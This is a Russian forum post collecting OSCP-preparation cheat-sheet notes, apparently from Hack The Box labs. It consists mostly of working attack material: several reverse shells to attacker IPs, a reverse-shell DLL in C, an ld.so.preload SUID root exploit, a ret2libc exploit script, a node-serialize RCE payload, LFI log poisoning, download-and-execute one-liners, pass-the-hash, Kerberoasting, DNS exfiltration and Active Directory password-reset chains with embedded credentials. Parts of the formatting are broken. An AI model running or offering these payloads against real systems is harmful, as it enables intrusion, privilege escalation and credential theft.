Доброе %CURRENT_TIME%. За погоней к OSCP я тут собираю различные материалы и заметочки. Решил некоторыми из них поделиться.
SMB:
Kerberoasting:
IIS-SHortScanner:
Python web server
Hack with SUID:
Suid shell:
Compile:
Rootshell:
Compile:
Execute shell:
Generate cert to ssh:
Execute&Compile:
Wfuzz Cookie:
Golden Ticket Automate:
Find libc address: ldd /usr/local/bin/backup
Find libc system function: readelf -s /lib32/libc.so.6 | grep system
Find libc exit function: readelf -s /lib32/libc.so.6 | grep exit
Find libc /bin/sh reference: strings -a -t x /lib32/libc.so.6 | grep /bin/sh
Example SUID:
Active Directory DACL Attack Chain:
LINKS:
Ещё в довесок
SMB:
- smbclient -L //10.10.10.100
- smbclient -N \\\\10.10.10.123\\general
- smbmap -H 10.10.10.107 -u alice1978 -p '00000000000000000000000000000000:0B186E661BBDBDCF6047784DE8B9FD8B' --download alice/my_private_key.ppk - скачать удаленно файл через pass-the-hash
Код:
sudo apt-get install cifs-utils
mkdir /mnt/Replication
Smbmap -R Replication -H <host> -A Groups.xml -q
mount -t cifs //10.10.10.100/Replication /mnt/Replication -o username=,password=,domain=active.htb
grep -R password /mnt/Replication/
gpp-decrypt <pass-gpppolicy>Kerberoasting:
- ldapsearch -x -h <HOST> -p 389 -D '<USER>' -w '<PASS>' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.1 13556.1.4.803:=2))(serviceprincipalname=*/*))" serviceprincipalname | grep -B 1 servicePrincipalName
- ldapsearch -x -h 10.10.10.100 -p 389 -D ‘SVC_TGS’ -w ‘GPPstillStandingStrong2k18’-b “dc=active,dc=htb” -s sub ”(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))” samaccountname | grep sAMAccountNamePage
- GetADUsers.py -all active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100
- GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request -output tgs-administrator.hash
- psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
- ldapsearch -x -h 10.10.10.100 -p 389 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1. 4.803:=2)))" samaccountname | grep sAMAccountName
- GetUserSPNs.py <SPN> -dc-ip <host> -request
- /opt/hashcat/hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt --force --potfile-disable
- john –format:krb5tgs hashws.txt –wordlist=/rockyou.txt
- wmiexec.py <SPN>
assword@host
- curl -s -G
Ссылка скрыта от гостей--data-urlencode "query={user}" | jq
- curl -s -G
Ссылка скрыта от гостей--data-urlencode 'query={user {username} }' | jq
- curl -s -G
Ссылка скрыта от гостей--data-urlencode 'query={user {username, password} }' | jq
- nmap -Pn -sV -sC -p80 --min-rate=300 <host>
- Drupal: /opt/droopescan/droopescan scan drupal -u
Ссылка скрыта от гостей
- nmap --script safe -445 10.10.10.100
- ./dirseach
- sslyze --regular 10.10.10.65
- ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.130 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
- nmap -p$ports -sC -sV -T4 10.10.10.130
- powershell "(new-object System.Net.WebClient).Downloadfile('http://<IP>/writeup.exe', 'writeup.exe')"
- cmd /c sc query state= all type= all | findstr SERVICE_NAME
- enum4linux -u hazard -p stealth1agent -a 10.10.10.149
- nmap --script-help ftp-anon
nmap -sV --script=nfs-ls 10.10.10.34
nmap --script ftp-brute scavenger.htb -p21
nmap --script smtp-enum-users.nse
nmap --script smtp-commands.nse 10.10.10.155 -p25 - masscan -p1-65535,U:1-65535 10.10.10.98 --rate=1000 -p1-65535,U:1-65535 -e tun0 > ports
- ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
- nmap -Pn -sV -sC -p$ports 10.10.10.98
- wpscan --url
Ссылка скрыта от гостей--wordlist /root/Desktop/writeups/apocalyst/list.txt --enumerate [plugin, users, tehemes]
- sslyze --regular 10.10.10.65
- find / -perm -4000 2>/dev/null
- ldd /usr/bin/myexe
- ldconfig -v | grep -v "^"$'\t' | sed "s/:$//g"
- cat /etc/ld.so.conf.d/*.conf
- fsutil fsinfo drive
- hashcat -m 7900 admin.hash /usr/share/wordlists/rockyou.txt -o admin.cracked –force
- zip2john BHWS_Backup.zip > hash
- john -w=rockyou.txt hash
- fcrackzip -D -p
- ssh2john id_rsa > span.john
- john span.john
- 7z2john.pl backup.7z > hash
- john --format=7z --wordlist=rockyou.txt hash
- \\10.10.14.14\share\nc64.exe -e cmd.exe 10.10.14.14 443
- wget
Ссылка скрыта от гостей
- nc -lvnp 8081
- nc64.exe -e cmd 10.10.14.11 8081
- python -c 'import pty; pty.spawn("/bin/sh")'
- rebootuser/LinEnum
- debugfs /dev/sda1
- runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object Net.Webclient).downloadstring('
Ссылка скрыта от гостей')"
- sudo -l
- linuxprivchecker
- /var/log/auth.log
- cron job
- SUID/GUID
- PS
- Netstat - nlp
- sudo - l
- Listener
- openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
- openssl s_server -quiet -key key.pem -cert cert.pem -port 73
- openssl s_server -quiet -key key.pem -cert cert.pem -port 136
- Client
- C:\..\openssl.exe s_client -quiet -connect 10.10.14.2:73 | cmd.exe | C:\..\openssl.exe s_client -quiet -connect 10.10.14.2:136"
- Client
- FOR /F "tokens=1" %g IN 'whoami' do (nslookup %g 10.10.14.23)
- FOR /F "tokens=1" %g IN 'dir /b c:\users' do (nslookup %g 10.10.14.23)
- Listener
- tcpdump -nni tun0 -vv port 53
- exploit/windows/local/bypassuac_eventvwr
- exploit/windows/local/ms10_015_kitrap0d
- ms16_032_secondary_logon_handle_privesc
- SecWiki/windows-kernel-exploits
- wget
Ссылка скрыта от гостей
- ./openssl base64 -in /etc/shadow | base64 --
- Icacls www
- certutil -urlcache -split -f <host>/file.exe
- mdb-tables backup.mdb | grep --color=auto user mdb-export backup.mdb auth_user
- readpst -tea -m Access\ Control.pst
for host in 1 2 3 4; do for port in 21 22 25 80 443 8080; do echo 172.19.0.$host:$port & openssl s_client -connect 172.19.0.$host:$port 2> /dev/null | grep CONNECTED; done; doneIIS-SHortScanner:
- java -jar /opt/IIS-ShortName-Scanner/iis_shortname_scanner.jar 2 20
Ссылка скрыта от гостей/opt/IIS-ShortName-Scanner/config.xml
- ssh -i bastion.key 10.10.10.65 -p 1022 -L :172.24.0.2:80
- ssh -N -L 60080:127.0.0.1:60080 ots-lMmVkNzA@10.10.10.133
- padbuster
Ссылка скрыта от гостей2zKLNWhe0Xt7G4ymYDK%2BEdptckP8a8vO 8 -cookies auth=2zKLNWhe0Xt7G4ymYDK%2BEdptckP8a8vO -encoding 0
- padbuster
Ссылка скрыта от гостей2zKLNWhe0Xt7G4ymYDK%2BEdptckP8a8vO 8 -cookies auth=2zKLNWhe0Xt7G4ymYDK%2BEdptckP8a8vO -encoding 0 -plaintext user=admin
- Отправляем запрос с хидером User-Agent: <?php system($_GET[‘c’]); ?>
- Через LFI читаем /var/log/apache2/access.log?c=id
- docker run -it -v /:/opt bash bash
- docker run -it -v `pwd`:/root quickbreach/powershell-ntlm
- echo 'ssh-rsa AAAAB3NzaC1yc2[.......................]smp root@host' > /home/zabbix/.ssh/authorized_keys
- echo "mkfifo /tmp/pepe; nc 10.1.0.42 8888 0</tmp/pepe | /bin/sh >/tmp/pepe 2>&1; rm /tmp/pepe" > /tmp/shell.sh
- tar cf www/arc.tar --checkpoint-action=exec=sh shell.sh --checkpoint=1 archive.tar lhennp shell.sh systemd-private-484fa214f76d4a889cc1e7a8563f7881-systemd-timesyncd.service-40OZJe www
- ssh -i /root/.ssh/id_rsa user@ip
- Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.2 -Port 4444
-
Ссылка скрыта от гостей
- rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1335 >/tmp/f
- nc -e /bin/sh 10.1.0.42 8888
- bash -i >& /dev/tcp/10.0.14.11/1339 0>&1
- echo%20%27%3C%3F%20%24sock%3Dfsockopen%28%2210.10.14.14%22%2C1234%29%3Bexec%28%22%2Fbin%2Fbash%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%20%3F%3E%27%20%3E%20wc.php
<?php $sock=fsockopen("10.10.14.14",1234);exec("/bin/sh -i <&3 >&3 2>&3"); ?>
- certutil.exe -urlcache -split -f
Ссылка скрыта от гостейc:\users\public\desktop\shortcuts\nc.exe
- cryptsetup luksDump backup.img | grep "Payload offset"
- dd if=backup.img of=header bs=512 count=4097
- hashcat -m 14600 -a 0 -w 3 header rockyou.txt
- java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cmd /c ping -n 2 10.10.16.32' > payload.bin
Код:
$pass = ConvertTo-SecureString '$sys4ops@megabank!' -AsPlainText -Force
$cred = new-object System.Management.Automation.PSCredential('alice', $pass)
$session = New-PSSession -ComputerName 10.10.10.132 -Credential
$cred -Authentication Negotiate Enter-PSSession $sessionPython web server
- python3 -m http.server 80 - server
- wget 10.10.16.32/rootshell - client
Код:
git clone https://github.com/GreatSCT/GreatSCT
cd GreatSCT/setup
sudo ./setup.sh -c
cd ..
./GreatSCT.py
powershell wget 10.10.16.32/payload.xml -O payload.xml cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xmlHack with SUID:
Suid shell:
Код:
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void)
{
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}Compile:
gcc -fPIC -shared -ldl -o libhax.so file1.cRootshell:
Код:
#include <stdio.h>
int main(void)
{
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}Compile:
gcc root.c -o rootshellExecute shell:
Код:
cd /etc umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls /tmp/rootshellGenerate cert to ssh:
- openssl genrsa -out client.key 2048
- openssl req -new -key client.key -out client.csr
- openssl x509 -req -in client.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out client.pem -days 1024 -sha256
- openssl pkcs12 -export -out client.pfx -inkey client.key -in client.pem -certfile intermediate.cert.pem
Код:
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <ws2tcpip.h>
#define DEFAULT_BUFLEN 1024
void ExecutePayload(void);
BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
ExecutePayload();
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
lifetime
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}
void ExecutePayload(void) {
Sleep(1000);
SOCKET mySocket;
sockaddr_in addr;
WSADATA version;
WSAStartup(MAKEWORD(2,2), &version);
mySocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr("10.10.16.32");
addr.sin_port = htons(4443);
if (WSAConnect(mySocket, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL,NULL, NULL)==SOCKET_ERROR)
{
closesocket(mySocket);
WSACleanup();
}
else {
char RecvData[DEFAULT_BUFLEN];
memset(RecvData, 0, sizeof(RecvData));
int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
if (RecvCode <= 0) {
closesocket(mySocket);
WSACleanup();
}
else {
char Process[] = "cmd.exe";
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;
memset(&sinfo, 0, sizeof(sinfo));
sinfo.cb = sizeof(sinfo);
sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE) mySocket;
CreateProcess(NULL, Process, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
WaitForSingleObject(pinfo.hProcess, INFINITE);
CloseHandle(pinfo.hProcess);
CloseHandle(pinfo.hThread);
memset(RecvData, 0, sizeof(RecvData));
int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
if (RecvCode <= 0) {
closesocket(mySocket);
WSACleanup();
}
if (strcmp(RecvData, "exit\n") == 0) {
exit(0);
}
}
}
}- apt install mingw-64
- i686-w64-mingw32-g++ pwn.cpp -lws2_32 -o srrstr.dll -shared
- cd C:\Users\Batman\AppData\Local\Microsoft\WindowsApps upload srrstr.dll
- cmd /c C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
Код:
$pass = convertto-securestring 'Zx^#QZX+T!123' -asplain -force
$cred = new-object system.management.automation.pscredential('arkham\batman', $pass)
enter-pssession -computer arkham -credential $credWfuzz Cookie:
- wfuzz -c --hw=29 -w /usr/share/SecLists/Passwords/darkweb2017-top1000.txt -H "Cookie: password=FUZZ"
Ссылка скрыта от гостей
- gcc -shared -fPIC -o libseclogin.so libseclogin.c
- sh ip bgp 10.120.15.0/25
- vtysh
- bgp 100
Код:
{"username":"_$$ND_FUNC$$_require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.8 1234 >/tmp/f', function(error, stdout, stderr) { console.log(stdout) })","country":"Lameville","city":"Lametown","num":"2"}Golden Ticket Automate:
- rpcclient -U htb\\james mantis.htb.local
- python ms14-068.py -u james@htb.local -d mantis.htb.local -p J@m3s_P@ssW0rd! -s S-1-5-21-4220043660-4019079961-2895681657
- python goldenPac.py htb.local/james@mantis.htb.local
- samratashok/nishang
- inquisb/icmpsh
- sysctl -w net.ipv4.icmp_echo_ignore_all=1
- wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
- whoami /all > C:\Users\Public\proof.tx
- .\juicypotato.exe -t * -p C:\Users\Destitute\root.bat -l 9001 -c {A9B5F443-FE02-4C19-859D-E9B5C5A1B6C6}
- net user Administrator abc123! -> shell
- psexec.py administrator@10.10.10.11
- pth-winexe -U jeeves/Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cb e81fe00 //10.10.10.63 cmd
Find libc address: ldd /usr/local/bin/backup
Find libc system function: readelf -s /lib32/libc.so.6 | grep system
Find libc exit function: readelf -s /lib32/libc.so.6 | grep exit
Find libc /bin/sh reference: strings -a -t x /lib32/libc.so.6 | grep /bin/sh
Example SUID:
Код:
import struct, subprocess
libc = 0xf75e2000
sysOffset = 0x0003a940
sysAddress = libc + sysOffset
exitOffset = 0x0002e7b0
exitAddress = libc + exitOffset
binsh = libc + 0x0015900b
payload = "A" * 512
payload += struct.pack("<I", sysAddress)
payload += struct.pack("<I", exitAddress)
payload += struct.pack("<I", binsh)
attempts = 0
while True:
attempts += 1
print "Attempts: " + attempts
subprocess.call(["/usr/local/bin/backup", "-i", "3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110", payload])Active Directory DACL Attack Chain:
- Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
- Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword -Verbose
- $UserPassword = ConvertTo-SecureString 'Sup3rS3cr3t!' -AsPlainText -Force -Verbose
- Set-DomainUserPassword -Identity claire -AccountPassword $UserPassword -Verbose
- $Cred = New-Object System.Management.Automation.PSCredential('HTB\claire', $UserPassword)
- Add-DomainGroupMember -Identity 'Backup_Admins' -Members 'claire' -Credential $Cred
- Get-ChildItem HKCU:\Software\Microsoft\Windows\CurrentVersion\Lxss | %{Get-ItemProperty $_.PSPath} | out-string -width 4096
- snmpwalk -Os -c public -v 1 10.10.10.20
- quentinhardy/odat
- Upload file: ./odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ writeup.exe writeup.exe
- Execute file: ./odat.py externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ writeup.exe
Код:
patator http_fuzz url=http://10.10.10.108/zabbix/index.php method=POST body='name=zapper&password=FILE0&autologin=1&enter=Sign+in' 0=/usr/share/SecLists/Passwords/darkweb2017-top1000.txt accept_cookie=1 follow=1 -x ignore:fgrep='Login name or password is incorrect.'LINKS:
-
Ссылка скрыта от гостей
-
Ссылка скрыта от гостей
-
Ссылка скрыта от гостей- !
-
Ссылка скрыта от гостей
- swisskyrepo/PayloadsAllTheThings
- paralax/Awesome-Pentest-1
- yeyintminthuhtut/Awesome-Red-Teaming
-
Ссылка скрыта от гостей
-
Ссылка скрыта от гостей
-
Ссылка скрыта от гостей
-
Ссылка скрыта от гостей
-
Ссылка скрыта от гостей
-
Ссылка скрыта от гостей
- samratashok/nishang
-
Ссылка скрыта от гостей
-
Ссылка скрыта от гостей
-
Ссылка скрыта от гостей
-
Ссылка скрыта от гостей
- paralax/Awesome-Pentest-1
- swisskyrepo/PayloadsAllTheThings
Ещё в довесок
Последнее редактирование:
